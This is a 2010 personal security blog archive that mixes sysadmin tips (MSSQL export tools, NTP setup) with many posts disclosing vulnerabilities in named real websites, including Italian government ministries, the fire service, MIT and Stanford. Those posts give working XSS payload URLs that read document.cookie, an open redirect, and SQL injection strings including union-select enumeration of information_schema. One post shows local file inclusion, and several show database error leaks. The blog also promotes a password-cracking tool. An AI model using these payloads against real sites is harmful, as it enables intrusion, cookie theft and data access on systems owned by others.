Thursday, 27 May 2010

MSSql or MSSqhell?

I've spent a lot of time into (crappy)coding some converters from mysql to access (and viceversa) while in internet we have already such tools and those dbms have already some basic features to export the whole databases in an human readable and easy to use format.
I've found that the biggest problem is the lack of decent tools to export mssql.
Since I'm quite busy I've hoped to find an easy solution (tool) to export the all the databases of a mssql express server in a simple sql text file.
I know that I can use "osql" to do a backup but I needed a damn sql text file with the structure and the data just to modify by hand several things and to understand also different kinds of queries and then restore the database in an error-free manner.

After a whole day I've found only a single decent tool that have worked efficiently and it's
EMS MS SQL Manager Lite
The lite version is free and it's good for a basic administration of an express version of MSSql.

If you have a full version of MSSql (€€€ $$$) you can export in several formats the database(s) by using the administration tools. The problem is that you need to own a software

----
Other generic free tools for the administration of MSSql (express)

DbaMgr

DbaMgr2k
http://www.asql.biz/en/Download.aspx#DbaMgr

osql batch database extractor (doesn't work as expected)
http://www.rs-freeware.org/osql/#install

Java client (I don't have java installed on the server and I had not the time to upload the jre, so I don't know if it's a good tool or not.
http://squirrel-sql.sourceforge.net/
-------


Suggestions about other tools are welcome.

net time on windows??? I've never used it before ...

I've recently find out that there are some commands that are available since windows 2000 (afaik) but some references are pointing to the availability since windows 95 (http://www.computerhope.com/nethlp.htm).
I've never used them but they are quite useful sometimes when you need to to synch several computers in batch, expecially within an active directory.


UDP port 123 (SNTP) - TCP port 37 (TIME)

I've added the nearest server.
net time /setsntp:"ntp.prato.linux.it"
(we can add other servers separated by a space)


on linux i've always used this command
sntp -a ntp.prato.linux.it
to adjust the time from a server

and/or editing
/etc/ntp.conf
with the simple string
server ntp.prato.linux.it

Lists of the servers are available on ntp.org
I'm unable to use the ntp pools, they just timeout (?).

https://support.ntp.org/bin/view/Servers/StratumOneTimeServers
https://support.ntp.org/bin/view/Servers/StratumTwoTimeServers
 https://support.ntp.org/bin/view/Servers/NTPPoolServers
http://tf.nist.gov/tf-cgi/servers.cgi


I know that this post is useless but I publish it for myself to remember something that I forget each time.


Suggestions and more informations are welcome.

Wednesday, 26 May 2010

mirror of the old website of packetstuff.com

I've found the mirror of the old website of packetstuff.com
with all the tools using the PSSDK (WinPCap to PSSDK migration module).
Some links are dead and there are too many banners but generally it should work.

http://packetstuff.interfree.it/

Friday, 21 May 2010

http://www.mfa.gov.ir | XSS

Simple XSS

http://www.mfa.gov.ir/cms/cms/simple_search.jsp
(in the form)
<script>alert(document.cookie);</script>

Thursday, 20 May 2010

rockol.it XSS

rockol.it XSS

the xss starts with a mouse over the link
http://www.rockol.it/search.php?s=Alessandra%20Amoroso%202010%3Cdollo'%20onmouseover='alert(1);'%20title='

Wednesday, 19 May 2010

Various tools that I've archived long time ago

A collection of various free tools and books that I've archived long time ago.

I've made several changes and I cannot mantain this collection updated each time.
http://websec.interfree.it 

Monday, 17 May 2010

gay.tv | XSS

gay.tv xss

XSS (simple)
-
(old and ... *fixed*)
http://www.gay.tv/aggregato.jsp?string=<script>alert(1);</script>&x=0&y=0

(new XSS)
----
http://www.gay.tv/search/?123%3Cscript%3Ealert%281%29;%3C/script%3E

Thursday, 13 May 2010

http://www.murrayky.gov | Sql injection

Sql Injection (id)
http://www.murrayky.gov/showevent.htm?ID='

-error-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
---


http://www.murrayky.gov/showevent.htm?ID=123+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16%20from%20information_schema.tables--

http://www.mssti.com/

abbcode.php problem

/home/mssti/public_html/phpbb3/

Wednesday, 12 May 2010

A list of useful crowdsourcing websites

 
-----------------
Reference/Source for the websites
("CrunchBase is the free database of technology companies, people, and investors")
-
 
----
The CrowdSpirit platform proposes a new model based on crowdsourcing that enables businesses to involve innovators from outside the company directly in the design of innovative products and services
----
----
----
----
----
----
----
crowdsourcing - movies
----
----
----
----
----
----
----
----
----
----

http://tweetmeme.com | XSS

while subscribing to utest.com i've found this simple xss on twetmeme.com (a service that they use to tweet ... I suppose).
funny .... ?

XSS ( no checks/sanitizing ... nothing)
http://tweetmeme.com/popup/option?url_id=984607153&source=utest&service=bit.ly.%22>%3Cvideo src=1 onerror=alert(document.cookie) >

http://tweetmeme.com/popup/option?url_id=984607153&source=utest%22%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%20%3E&service=bit.ly

http://tweetmeme.com/popup/option?url_id=984607153%22%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%20%3E&source=utest&service=bit.ly

redirecting anywhere
http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=135&nurl=http://www.google.com

spammy
http://blog.tweetmeme.com/?s=.&feed=Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc sit amet elit turpis. Cras elementum, turpis quis rutrum viverra, dui sapien auctor lorem, sed suscipit dui odio eget ligula. Nunc a sem mauris, a porta tortor. Nunc in varius justo. Praesent venenatis ultrices condimentum. Morbi eget imperdiet ante. Praesent eros metus, pulvinar nec laoreet a, aliquam nec orci. Nunc cursus condimentum lacus, at dictum sapien tincidunt non. Nullam gravida condimentum leo, id porta nibh placerat sit amet. Phasellus sed elit vel quam ornare laoreet.

Monday, 10 May 2010

www.interno.it | XSS

various characters are replaced but the xss is still possible and we can redirect the user where we want to.
The xss is triggered by the onmouseover on the available images.

In this case we send the user to google.

XSS

http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/index.html?month=5%22%20onmouseover=%22location.href='http://www.google.com';


same problem in other pages of the website
http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/9.html?month=5%22%20onmouseover=%22location.href=%27http://www.google.com%27


Note: we can also change the stylesheet and do other things.This is just a sample.

New Version of mdcrackgui

"A simple GUI for the mdcrack application. -MDCrack is a free featureful password cracker designed to bruteforce 21 algorithms: MD2, MD4, MD5, HMAC-MD4, HMAC-MD5, FreeBSD, Apache, NTLMv1, IOS and PIX (both enable and user) hashes"

List of the supported algorithms
MD2, MD4, MD5, MD5MD5, MD4MD4, MD4MD4S, MD5MD5S, HMAC-MD4, HMAC-MD5,IPB2, PHP, PHPS, FREEBSD, NTLM1, PIX, PIX-U, IOS, APACHE, CRC32, CRC32-B, ADLER32

The output/error redirection of the console to a textbox is still not fully working. You can still use the console (as default).

https://sourceforge.net/project/mdcrackgui

New version of Firefox Portable WebTools

New version of  Firefox Portable WebTools

"a Portable version of Mozilla Firefox with several add-ons that are useful for Web Application Security. The purpose of this package is to have the best available addons to manually test XSS, SQL, siXSS, CSRF, Trace XSS, RFI, LFI, etc"


The changes
Added Theme Sky+
Added Groundspeed Addon
No-Script Updated
.net addon updated
Added a long list of (my) bookmarks. Initial sorting and organization.
Added a batch file to clean a bit of useless data


https://sourceforge.net/projects/firefoxwebtools


In the next  version
Added FireGPG (still under testing not yet portable)
Cleaning for FireGPG (to check if we want to remove the keys )
Firebug Updated
Access Me Updated
SQL Inject Me Updated
XSS Me Updated
Wappalyzer Updated

Probably I will add an intermediate releas with only the regular updates of the addons.

Sunday, 9 May 2010

casapounditalia.org | SQL Injection in joomla

 Sample POST (joomla bug - google for it)
http://www.casapounditalia.org:80/index.php?option=com_content&view=%2527&id=35&Itemid=60
id=35&sectionid=6&task=category&filter_order=a%2Edates

----

Warning: Invalid argument supplied for foreach() in /home/casapoundi/domains/casapounditalia.org/public_html/components/com_content/models/category.php on line 337

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/casapoundi/domains/casapounditalia.org/public_html/libraries/joomla/database/database/mysql.php on line 344

Chi Siamo

Friday, 7 May 2010

kisskiss.it | XSS

XSS (nick)
http://www.kisskiss.it/Eventi?s=1&nick=nickname<script>alert(1);</script>&profilo=4558b8be-57ba-11df-8fc9-9dcf6b19122e

 -
http://www.kisskiss.it/OnAir?radio=%3Cscript%3Ealert(document.cookie);%3C/script%3Esroldasrock

Wednesday, 5 May 2010

A list of chat, live chat scripts

A list of chat, live chat scripts.

https://sourceforge.net/projects/webberchat/
https://sourceforge.net/projects/icsc/
https://sourceforge.net/projects/ajax-chat/
https://sourceforge.net/projects/cconnect/
https://sourceforge.net/projects/phpchatter/
http://www.craftysyntax.com/
http://code.google.com/p/php-lively/
http://mibew.org/
http://www.reallinkchat.com/
http://www.helpcenterlive.com/
http://www.chattist.com/

Under testing

Tuesday, 4 May 2010

vark.com | XSS

Vark.com has been lately acquired by google.

 this xss seems to be useless (theorically harmless).



just add for a new topic

<img src=1 onerror=alert(document.cookie)>


-------------

For the second XSS




do the same
<img src=1 onerror=alert(document.cookie)>
adding a topic to one of your friends

---------------------------------
For the third XSS add the XSS payload

<img src=1 onerror=alert(document.cookie)>
in the activities of your profile and when vark.com will load them (after registration, in the share area)
you will see it working.
This will work only one time.

-----------

All those XSSs are useless in theory.

metranslate

I've added on sourceforge a very old vb.net application.
It's really crappy and outdated but it should work and can still be used for the latest language files of Mailenable.


https://sourceforge.net/projects/metranslate/
A standalone application that helps into translating language files of the mailenable application (Mail Server for Microsoft Windows).
Mailenable website http://www.mailenable.com/ 
Thi is an alternative to the MELangTranslator.exe for mailenable.

Facebook Application ..... partial XSS ...

Facebook Application XSS
(basicly you can load also any image to the user ex. the google logo)

http://apps.facebook.com/funny_pho_to_widget/?shared=



I'm not able to inject other js functions (that are encoded or removed) ... so I'm a bit stuck with the fact that I cannot use the cookies.
I will add more informations if I can do something different from a stupid and useless alert.

FirefoxPortableWebTools 0.0.0.4

A new version of Firefox Web Tools is available for the download
https://sourceforge.net/projects/firefoxwebtools/

"A Portable version of Mozilla Firefox with several add-ons that are useful for Web Application Security. The purpose of this package is to have the best available addons to manually test XSS, SQL, siXSS, CSRF, Trace XSS, RFI, LFI, etc"


-Changelog-

FirefoxPortableWebTools-0.0.0.4
Added Theme Sky+
Added Groundspeed Addon
No-Script Updated
.net addon updated
Added a long list of (my) bookmarks. Initial sorting and organization.
Added a batch file to clean a bit of useless data

Read the respective licenses of mozilla firefox and all the addons!


Maybe I'm the only person that is using it :)
Anyway .... it's free.

Monday, 3 May 2010

http://search.mit.edu/ - http://sap.mit.edu | XSS

simple XSS in the search form
http://sap.mit.edu/information/search/

"><script>alert(document.cookie);</script><"
---

xss
-
http://search.mit.edu/search?q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&btnG=Go&site=mit&client=mit&proxystylesheet=http%3A%2F%2Fweb.mit.edu%2Fcre%2Fc%2Fgoogle-crestyles-v4.xsl&output=xml_no_dtd&as_dt=i&as_sitesearch=http%3A%2F%2Fweb.mit.edu%2Fcre&proxyreload=1

www.slac.stanford.edu | XSS

http://www.slac.stanford.edu/spires/find/jobs/wwwbrief?FIELD=&REGION=&RANK=&cc=&SEQUENCE=da%28d%29&abs=%22%3E%3Cvideo+src%3D1+onerror%3Dalert%28document.cookie%29%3E

comune.trento.it | SQL Injection

SQL Injection jsp->DB2.

(this works after a few post requests)
http://webapps.comune.trento.it/statistiche_elettorali/StatisticheLista.do?arkRifMan=1272909259708,1272909305354&pager.order_by=WKVOVA0'8

javax.servlet.jsp.JspException: ServletException in '/framework/statistiche_lista.jsp': Errore DB :Errore SQL file : ETWKXXF1 [SQL0010] Inizio costante stringa '8, WKVOV' non delimitato.

www.israelnationalnews.com | XSS

XSS
http://www.israelnationalnews.com/Subscribe/?email=dasewqr%40dasa.com%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E&subscribe_submit=Join

www.sviluppoeconomico.gov.it | XSS - Blind SQL Injection - LFI - System Compromise

http://www.sviluppoeconomico.gov.it/primopiano/dettaglio_primopiano.php?sezione=primopiano&tema_dir=../index.php&id_primopiano=87
Warning: require(../../index.php\0\0/navigazione/right_menu.php) [function.require]: failed to open stream: No such file or directory in /var/www/sitomap/primopiano/dettaglio_primopiano.php on line 25


sample sql inj.
http://www.sviluppoeconomico.gov.it/organigramma/elenco_dossier.php?sezione=organigramma&tema_dir=tema2&gruppo=5%20group%20by%201

-
Fatal error: Call to a member function Fields() on a non-object in /var/www/sitomap/class/lista_dossier.php on line 45
-

http://www.vigilfuoco.it | XSS - SQL Injection

Full of xss and sql injections. Access to 2 dbms. Possible system compromise.  (main language asp)

----------------------------------------------OLD deadlinks/fixed -------------------------------
XSS
http://www.vigilfuoco.it/emailCert/default.asp (form)
"><script>alert(document.cookie);</script><"



http://prevenzioneonline.vigilfuoco.it/VVF/HttpAdapter?CMD=loginDebole&forward=consultazioneMultiplaHandler&codFun=2&action_btn=loginInSessione&nomeServizio=Consultazione%3Cscript%3Ealert(document.cookie);%3C/script%3E


SQL Injections

The first with an oracle error
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?menu=52'

-------------------------------------------------------
OraOLEDB error '80004005'

ORA-01756: stringa tra virgolette terminata in modo irregolare

/includes/menu.asp, line 44
--------------------------------------------------------





This one is related to
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?cboPeriodo=%3Casso4&btnNome1=Vai

-------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id_periodo = <asso4'.

/informazioni/norme_attivita_istituzionali/indice_cronologico.asp, line 72
-------

http://www.vigilfuoco.it/notiziario/archivio.asp (form)
---------
OraOLEDB error '80004005'

ORA-01756: stringa tra virgolette terminata in modo irregolare

/notiziario/archivio.asp, line 378
--------




http://www.vigilfuoco.it/informazioni/uffici_territorio/direzioni.asp?reg=7
----------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Virgoletta di chiusura mancante prima della stringa di caratteri ''.

/informazioni/uffici_territorio/direzioni.asp, line 225
----------------------------
-------------------------------------------------------------------------------------------------------

--------------------------NEW---------------------------------------------
Oracle DB Sql Injection

http://www.vigilfuoco.it/informazioni/uffici_territorio/GestioneSiti/homepageTemplate.asp?s=361{SQL INJECTION HERE}&p=1041

http://www.vigilfuoco.it/sitiVVF/vercelli/notizia.aspx?codnews=12908&s=361{SQL INJECTION HERE}

http://www.vigilfuoco.it/sitiVVF/vercelli/uffici.aspx?s=361{SQL INJECTION HERE}&p=1044{SQL INJECTION HERE}


Twitter Delicious Facebook Digg Stumbleupon Favorites More